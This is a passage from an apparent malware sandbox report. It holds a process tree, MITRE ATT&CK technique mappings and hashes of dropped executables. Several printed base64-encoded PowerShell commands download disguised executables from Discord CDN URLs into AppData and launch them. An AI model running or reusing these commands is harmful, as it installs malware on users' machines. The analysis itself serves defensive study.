        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAeABlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADIAOAA2ADcANAA3ADcAMAA5ADUANwAyAC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGEAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ARABTAEYAQgAxAC4AZQB4AGUAJwApACkAPAAjAHMAcABzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAZQB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAGwAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ARABTAEYAQgAxAC4AZQB4AGUAJwApADwAIwBzAHUAaQAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4372
        
        C:\Users\Admin\AppData\Roaming\PODSFB1.exe
        
        "C:\Users\Admin\AppData\Roaming\PODSFB1.exe"
        9⤵
        Executes dropped EXE
        
        PID:404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 804
        10⤵
        Program crash
        
        PID:4780
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\0Mjmp5O7Ru.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\0Mjmp5O7Ru.exe
        
        C:\Users\Admin\AppData\Local\Temp\0Mjmp5O7Ru.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMAMAA3ADUAMAA1ADMAMQA5ADkANgA2AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAaQBrAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AG4AaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAHAAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWABBAFMAMQAyADMALgBlAHgAZQAnACkAKQA8ACMAcAByAHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABsAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAcgByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0ATgBYAEEAUwAxADIAMwAuAGUAeABlACcAKQA8ACMAeABhAGwAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
        
        C:\Users\Admin\AppData\Roaming\MNXAS123.exe
        
        "C:\Users\Admin\AppData\Roaming\MNXAS123.exe"
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5096
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\FcoOfTN2qA.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\FcoOfTN2qA.exe
        
        C:\Users\Admin\AppData\Local\Temp\FcoOfTN2qA.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMAMgA5ADMAMgA4ADIANwA5ADUAOQAzAC8AaQBvAGQAaQBwAHAAYwBtAG0AbAAuAGUAeABlACcALAAgADwAIwB1AGwAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHIAZQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAegBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBNAE4AWgBYAEMAQgA2ADkALgBlAHgAZQAnACkAKQA8ACMAZwB0AGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagBoAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAbAB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBNAE4AWgBYAEMAQgA2ADkALgBlAHgAZQAnACkAPAAjAHYAcwB1ACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\gQjw5cdLV3.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2136
        
        C:\Users\Admin\AppData\Local\Temp\gQjw5cdLV3.exe
        
        C:\Users\Admin\AppData\Local\Temp\gQjw5cdLV3.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:2816
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\PRNzqO3YaE.exe
        6⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\PRNzqO3YaE.exe
        
        C:\Users\Admin\AppData\Local\Temp\PRNzqO3YaE.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:824
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\yIvJwtAgxW.exe
        6⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\yIvJwtAgxW.exe
        
        C:\Users\Admin\AppData\Local\Temp\yIvJwtAgxW.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:2368
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\90qfEXMyuo.exe
        6⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\90qfEXMyuo.exe
        
        C:\Users\Admin\AppData\Local\Temp\90qfEXMyuo.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAbABrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADQAMAA1ADEANgA5ADYAOAA0ADQAOQAwAC8AdwBJAE4AUgBBAFIAXwBwAHIAbwB0AGUAYwB0AGUAZAAuAGUAeABlACcALAAgADwAIwBqAGQAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAdgBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AWABaAEwAQQBIADEAMgAzADIALgBlAHgAZQAnACkAKQA8ACMAYgBqAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdAB5AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAawBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AWABaAEwAQQBIADEAMgAzADIALgBlAHgAZQAnACkAPAAjAG0AdgBmACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4504

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcABqACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMANAAwADkAMwAzADkAMQAwADUANAA4AC8AVwBDAHIAbwBuAFMAZQBjAHUAcgBpAHQAeQBfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAHYAegBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawByAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABsAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABLAEMAWgBYAEIATgBNADkAMQAuAGUAeABlACcAKQApADwAIwBxAHkAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHEAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABLAEMAWgBYAEIATgBNADkAMQAuAGUAeABlACcAKQA8ACMAZQBpAHYAIwA+AA=="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdwBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMANQA2ADYAOAA3ADcAMgA0ADUAOAA0AC8ARABlAGYAZQBuAGQAZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAawBlAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AHEAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8AVQBBAFMARABCAE4AQwAuAGUAeABlACcAKQApADwAIwBzAHQAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHMAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQB6AG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFUAQQBTAEQAQgBOAEMALgBlAHgAZQAnACkAPAAjAHcAZABoACMAPgA="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbQBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAMQA3ADMANwA2ADgAMQAyADAAMgA0ADYANAAxADMALwAxADAANQAxADEANwA1ADMANwA0ADkAOQA1ADgANQA3ADQANgA4AC8AVwBpAG4AZABvAHcAcwBTAGgAZQBlAGwASABvAHMALgBlAHgAZQAnACwAIAA8ACMAegBnAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAGcAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBCAFgAWgBDAEsATABBADgAOQAyADEALgBlAHgAZQAnACkAKQA8ACMAYQBnAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgB4AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAZwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAWABaAEMASwBMAEEAOAA5ADIAMQAuAGUAeABlACcAKQA8ACMAbgBtAHIAIwA+AA=="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748

C:\Users\Admin\AppData\Roaming\HDJ3.exe
C:\Users\Admin\AppData\Roaming\HDJ3.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2252
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 404 -ip 404
1⤵
PID:4732

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HDJ3.exe.log

Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eea470ed6df299fbc1b513b13824dd68

SHA1
126e4ec1f0fbdbbf12f4a843560c117f5932b6ee

SHA256
a7aaf7d6c654e2fd2af16f1b277696c5cdc600d5c28cb240c2c72181523b60d1

SHA512
bf6416bf02cc42f288bd5fbe6ff25c5dc7c649b3ef6f2939fad2228b386c899eb762e0c726b11fb453f194063162ffb1b8f1c9f3b6c4fc666c00b6ceaaf5ffcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eea470ed6df299fbc1b513b13824dd68

SHA1
126e4ec1f0fbdbbf12f4a843560c117f5932b6ee

SHA256
a7aaf7d6c654e2fd2af16f1b277696c5cdc600d5c28cb240c2c72181523b60d1

SHA512
bf6416bf02cc42f288bd5fbe6ff25c5dc7c649b3ef6f2939fad2228b386c899eb762e0c726b11fb453f194063162ffb1b8f1c9f3b6c4fc666c00b6ceaaf5ffcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1ac91b5cbaee1716597f815b59fc04d6

SHA1
06a81b1c3f692d18b9b8a2ac396beef5db89da4f

SHA256
5eab192250ef11a9c0c8dcc67101290a7dd6c56eaca4f0c937a90e5dbd115ecb

SHA512
d8190b750758928bf0459237306cf175385c0c2f3d633ab2bffe1f4a3b5d90d59412d9ed57f45ffeb071b3a2fb601606c02432f4fcff9bdb3b0dd74dbb929ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6500224947206fab25690397fca489e

SHA1
8f61dd35d00c5dcc990fb2840982841545b2d953

SHA256
846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

SHA512
aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6500224947206fab25690397fca489e

SHA1
8f61dd35d00c5dcc990fb2840982841545b2d953

SHA256
846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

SHA512
aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e942aadc56bfd6885115fa4d65b56a04

SHA1
ed778f04ec6ca615686ce9d239d7d4688715d6f2

SHA256
450f4b18e27486e793dacde81f79112ffe1a659992b17fd103bf9a16e613c7b0

SHA512
842711f37d9abd1fdf53a46529c1d0700e82da1973f0c3e6b66070efccc0393396560c3a0287719f2d641a4ede00a6da7cb072f07817c8cd0c45cd2ca46e61e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d0c6056e0fb8aed7b32c7a592d0ee897

SHA1
9721fdbeaf2ac95856ee5544ef742d64f35e60f0

SHA256
38429492bd95fd8f8d7271bfe80e6b26e9e142a8f36c2562cbb878dc633dc1aa

SHA512
320aa47020f63e854daac281b7b8eb337a2d79804016cc0a09405edf9953559482d23e2044b09e98478c181715dafd3c5f8566da0b89790ef03068f062ebd780

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe

Filesize
537KB

MD5
43f232536b413ebf169141944069ae77

SHA1
0efc90691d45072ddd595cc4c2258e2f4bea42de

SHA256
a227c96af593108664720742c60c200d370094fb1c2acf8ff5516611917f2c64

SHA512
3adb48ae6dcdfbea2ac3bea9439e1d5d44884a3a5d5f3ac31ff9ad7a437f8a877a4ca8a1eda9213d4bced7e5c1181a0197aa957d422620a83fbbc745b0f470f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe

Filesize
537KB

MD5
43f232536b413ebf169141944069ae77

SHA1
0efc90691d45072ddd595cc4c2258e2f4bea42de

SHA256
a227c96af593108664720742c60c200d370094fb1c2acf8ff5516611917f2c64

SHA512
3adb48ae6dcdfbea2ac3bea9439e1d5d44884a3a5d5f3ac31ff9ad7a437f8a877a4ca8a1eda9213d4bced7e5c1181a0197aa957d422620a83fbbc745b0f470f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\0Mjmp5O7Ru.exe

Filesize
6KB

MD5
0835698cd3e5aed0290bd3a3121a550b

SHA1
d513a4f304f936cc4c3130bff5a228ca0ab5632c

SHA256
391a06c02683013603927e4e3735d00a90a4862bac071951e53c8fa97492a96f

SHA512
ba92e380b9a7c93c22e53ffcd2ba084fc8b220ffc6d30d30ccf84efbd9da8d7305a824779a0e7aab3118e590c6ec8e915cbe23ee4249b90c10f85ed9bc337674

Download Submit
C:\Users\Admin\AppData\Local\Temp\0Mjmp5O7Ru.exe

Filesize
6KB

MD5
0835698cd3e5aed0290bd3a3121a550b

SHA1
d513a4f304f936cc4c3130bff5a228ca0ab5632c

SHA256
391a06c02683013603927e4e3735d00a90a4862bac071951e53c8fa97492a96f

SHA512
ba92e380b9a7c93c22e53ffcd2ba084fc8b220ffc6d30d30ccf84efbd9da8d7305a824779a0e7aab3118e590c6ec8e915cbe23ee4249b90c10f85ed9bc337674

Download Submit
C:\Users\Admin\AppData\Local\Temp\0aQOKpbqSh.exe

Filesize
5KB

MD5
3615a536f807d9df581dd22a69384f93

SHA1
3ab3e0f84e8d22c4b73e510d9c3d7f2ebc030434

SHA256
e3a3f8efb3c30c323316c5e25b73464af9e5fa89962f8b165f5a625f8e0b0785

SHA512
a7d713b349236898dd9f40b050d02330788b6e4462cefaf871506cf3251830fbcc328078853861a8e3c007fa33d1e509ef25cc841753c1bad9ef45ca8c022069

Download Submit
C:\Users\Admin\AppData\Local\Temp\0aQOKpbqSh.exe

Filesize
5KB

MD5
3615a536f807d9df581dd22a69384f93

SHA1
3ab3e0f84e8d22c4b73e510d9c3d7f2ebc030434

SHA256
e3a3f8efb3c30c323316c5e25b73464af9e5fa89962f8b165f5a625f8e0b0785

SHA512
a7d713b349236898dd9f40b050d02330788b6e4462cefaf871506cf3251830fbcc328078853861a8e3c007fa33d1e509ef25cc841753c1bad9ef45ca8c022069

Download Submit
C:\Users\Admin\AppData\Local\Temp\90qfEXMyuo.exe

Filesize
6KB

MD5
d8c489387b4897ddfc2b2cef00549806

SHA1
b90763f4ba01094b2ead4c4f1fec8d3f9b65d764

SHA256
99749cdda22e3e89f1f96abe450a050e4fc7398810809c0a50ac0b5767ba8bab

SHA512
e810daa7bc95b326dc1f533e4995e99bae08d32aa69d7618fa4bb672b8a26c70e46c0e7628e41eb94ec45f5ef032e24030c1e20471736cc799a0a37ccf0c4910

Download Submit
C:\Users\Admin\AppData\Local\Temp\90qfEXMyuo.exe

Filesize
6KB

MD5
d8c489387b4897ddfc2b2cef00549806

SHA1
b90763f4ba01094b2ead4c4f1fec8d3f9b65d764

SHA256
99749cdda22e3e89f1f96abe450a050e4fc7398810809c0a50ac0b5767ba8bab

SHA512
e810daa7bc95b326dc1f533e4995e99bae08d32aa69d7618fa4bb672b8a26c70e46c0e7628e41eb94ec45f5ef032e24030c1e20471736cc799a0a37ccf0c4910

Download Submit
C:\Users\Admin\AppData\Local\Temp\FcoOfTN2qA.exe

Filesize
6KB

MD5
ce4a1803c1e2d461852ad3265167840b

SHA1
f5b62f0fe8a8a93208a80313ba97c1b594eff2a2

SHA256
24caa0f2f75c3b8761e99e602cfcd0fab9d3d2134b2d7fd6a5396c2c202baf2c

SHA512
3258367b884a18085cf508a468a30d8d03f7b51523a92a78542e3580d4637c3744ab45b14e90dd05fe2568bb061098fd5162ceac7b987dacaffd2abc93773011

Download Submit
C:\Users\Admin\AppData\Local\Temp\FcoOfTN2qA.exe

Filesize
6KB

MD5
ce4a1803c1e2d461852ad3265167840b

SHA1
f5b62f0fe8a8a93208a80313ba97c1b594eff2a2

SHA256
24caa0f2f75c3b8761e99e602cfcd0fab9d3d2134b2d7fd6a5396c2c202baf2c

SHA512
3258367b884a18085cf508a468a30d8d03f7b51523a92a78542e3580d4637c3744ab45b14e90dd05fe2568bb061098fd5162ceac7b987dacaffd2abc93773011

Download Submit
